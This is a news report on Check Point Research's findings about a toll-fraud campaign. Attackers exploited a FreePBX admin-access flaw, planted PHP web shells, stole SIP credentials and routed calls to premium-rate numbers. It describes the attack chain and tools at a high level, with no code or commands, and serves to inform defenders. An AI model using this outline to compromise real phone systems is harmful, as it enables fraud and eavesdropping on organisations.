One of the most interesting yet complex methods of exploitation employed by hackers is using the servers to make outgoing phone calls to generate profits.
Check Point Research uncovered a cyber fraud campaign being operated from Gaza, Egypt, and West Bank. The hackers have compromised VoIP (voice over Internet Protocol) servers of over 1,200 organizations in 60 countries within the past one year.
Researchers believe that the threat actors are located in the Palestinian Gaza Strip. They target an open-source user interface dubbed Sangoma PBX, which is used for the management and controlling of Asterisk VoIP phone systems, specifically the Session Initiation Protocol (SIP) servers.
In their report, Check Point researchers noted that “there appears to be a systematic exploitation pattern of SIP servers from different manufactures,” and the campaign seems to be part of a “large, profitable business model run by hackers.”
Asterisk is a widely used and popular VoIP PBX (private branch exchange) system used by a majority of Fortune 500 firms for telecommunication. PBX is a switching system used to establish and control phone calls between telecommunication endpoints like the PSTN (public switched telephone network) destinations, standard telephone sets, and services/devices on VoIP networks.
According to researchers, the attackers exploit a critical vulnerability in Sangoma (CVE-2019-19006) that allows them to gain admin access to the system. This vulnerability impacts the administrator web interface for PBXact and FreePBX, enabling the attackers to acquire admin access to any system by sending out specially created packets to the targeted server.
The campaign begins with scanning, proceeds to exploit the vulnerability, and then culminates into web shell installation. Once the system access is acquired, the hackers can easily abuse the servers to fulfill their malicious objectives.
The attackers use the SIPVicious tool suite for auditing SIP-based VoIP systems. To detect SIP systems using vulnerable FreePBX versions, they use the svmapmodule and exploit the CVE-2019-19006 vulnerability if they find one.
One of the most interesting yet complex methods of exploitation employed by hackers is using the servers to make outgoing phone calls to generate profits. Since phone calls are a legit feature of the system, it becomes hard to detect whether someone is exploiting the server or performing its regular functions.
In another attack flow, Check Point researchers identified that hackers used an initial PHP web shell to gain control of the FreePBX systems’ database and obtain passwords for various SIP extensions. This method grants them unrestricted access to the whole system, and they can make phone calls from every extension.
The attack has a second version as well, in which the operators utilize the initial web shell for downloading a base64-encoded PHP file. The file is decoded for launching a web panel that allows their adversary to make calls from the compromised system using the Elastix and FreePBX support, alongside running hard-coded and arbitrary commands.
This campaign relies extensively on Pastebin to download password-protected web shells, which is why Check Point researcher believes that it could be the work of an uploader known as INJ3CTOR3. This attacker is linked to a previously discovered SIP Remote Code Execution Vulnerability (CVE-2014-7235), as well as several private Facebook groups used for sharing SIP server exploits.
Researchers noted that the hacked VoIP servers could make calls to International Premium Rate Numbers (IPRN). These are premium numbers that businesses use to offer phone-based purchases or services like putting the caller on hold at a slightly higher fee.
The customer making the calls to IPRNs will pay the fee, so the more calls an IPRN owner receives and the longer their clients have to wait to complete the transaction, the money amount will be charged to the customers and the telecom service providers.
The campaign operators offer to sell their targeted businesses’ call plans, phone numbers, and live access, which they have hacked via the compromised VoIP services to the highest bidders. So far, they have earned hundreds of thousands of USD in profit along with eavesdropping on phone calls.